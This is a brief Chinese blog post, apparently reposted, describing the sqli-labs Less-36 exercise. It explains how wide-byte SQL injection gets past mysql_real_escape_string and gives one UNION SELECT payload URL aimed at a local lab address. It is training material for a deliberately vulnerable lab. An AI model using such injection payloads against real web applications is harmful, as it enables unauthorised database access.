码迷,mamicode.com
首页 > 数据库 > 详细

【sqli-labs】 less36 GET- Bypass MYSQL_real_escape_string (GET型绕过MYSQL_real_escape_string的注入)

时间:2018-01-30 16:29:15      阅读:247      评论:0      收藏:0      [点我收藏+]

标签:函数   gpo   ast   mys   分享图片   技术分享   get   sql   div   

技术分享图片

看一下mysql_real_escape_string()函数

\x00  技术分享图片

\x1a  技术分享图片

技术分享图片

 注入的关键还是在于闭合引号,同样使用宽字节注入

http://192.168.136.128/sqli-labs-master/Less-36/?id=0%df‘ union select 1,2,3%23

技术分享图片

 

【sqli-labs】 less36 GET- Bypass MYSQL_real_escape_string (GET型绕过MYSQL_real_escape_string的注入)

标签:函数   gpo   ast   mys   分享图片   技术分享   get   sql   div   

原文地址:https://www.cnblogs.com/superkrissV/p/8384526.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!